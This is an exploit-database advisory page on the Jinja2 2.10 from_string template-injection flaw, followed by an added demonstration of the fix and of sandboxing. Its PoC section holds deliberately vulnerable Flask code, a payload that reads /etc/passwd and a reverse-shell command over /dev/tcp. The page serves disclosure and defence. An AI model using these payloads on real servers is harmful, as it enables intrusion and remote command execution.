
"Jinja2 2.10 - 'from_string' Server Side Template Injection"

Author

JameelNabbo

Platform

python

Release date

2019-02-15

import requests

# Fetch this entry's metadata from the site's exploit-details API and print the JSON body
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46386/?format=json')
print(response.json())

Response:
{"url": "https://www.nmmapper.com/api/exploitdetails/46386/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46386/40853/jinja2-210-from-string-server-side-template-injection/download/", "exploit_id": "46386", "exploit_description": "\"Jinja2 2.10 - 'from_string' Server Side Template Injection\"", "exploit_date": "2019-02-15", "exploit_author": "JameelNabbo", "exploit_type": "webapps", "exploit_platform": "python", "exploit_port": null}

'''
# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341


// The from_string function is prone to SSTI: it takes the "source" parameter, compiles it into a template object, renders it and returns the result. Any user-controlled text that ends up in "source" is therefore evaluated as template code, not as data.


// Here is an example of vulnerable code that uses the from_string function to handle a GET parameter called 'username' and returns Hello {username}:
'''

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)


@app.route("/")
def index():
    # Vulnerable by design: the user-supplied value is concatenated into the
    # template *source*, so Jinja2 evaluates whatever expressions it contains.
    username = request.values.get('username', '')
    return Environment().from_string('Hello ' + username).render()


if __name__ == "__main__":
    app.run(host='127.0.0.1', port=4444)

'''
POC
//Exploiting the username param
http://localhost:4444/?username={{4*4}}
OUTPUT: Hello 16

Reading the /etc/passwd

http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}


Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}


How to prevent it:
Never let the user provide template content.
'''
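The following is an added example, not part of the advisory, that places the vulnerable from_string pattern next to the fix the advisory recommends (the template source stays a fixed literal and user input is passed only as a render variable) and next to Jinja2's SandboxedEnvironment as a defence-in-depth layer. It runs without Flask; the sample inputs are constructed here, and DUNDER_PROBE is only the first attribute hop of the advisory's payload, used to show that the sandbox refuses it.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError

# Constructed sample inputs for this demo (not taken from the advisory's PoC).
BENIGN = "alice"
PROBE = "{{4*4}}"                            # the advisory's arithmetic probe
DUNDER_PROBE = "{{ ''.__class__.__mro__ }}"  # first hop of the advisory's attribute walk


def render_vulnerable(username: str) -> str:
    """Mirror of the advisory's handler: user input becomes template SOURCE."""
    return Environment().from_string("Hello " + username).render()


def render_safe(username: str) -> str:
    """The fix the advisory recommends: the template source is a fixed literal and
    user input is only ever a render *variable*, so {{4*4}} stays literal text.
    autoescape additionally neutralises HTML in the value once this is served as a page."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ username }}").render(username=username)


def render_sandboxed(username: str) -> str:
    """Defence in depth only. SandboxedEnvironment still evaluates expressions in
    attacker-supplied source ({{4*4}} still becomes 16), but it refuses the dunder
    attribute access the advisory relies on, raising SecurityError instead."""
    try:
        return SandboxedEnvironment().from_string("Hello " + username).render()
    except SecurityError:
        return "blocked"


if __name__ == "__main__":
    for label, fn in (("vulnerable", render_vulnerable),
                      ("safe", render_safe),
                      ("sandboxed", render_sandboxed)):
        for value in (BENIGN, PROBE, DUNDER_PROBE):
            print(f"{label:10} {value!r:32} -> {fn(value)!r}")
```

A quick regression check for an application is to send the arithmetic probe through each template-rendering endpoint: a response containing "16" where "{{4*4}}" was submitted is the tell-tale of the vulnerable pattern.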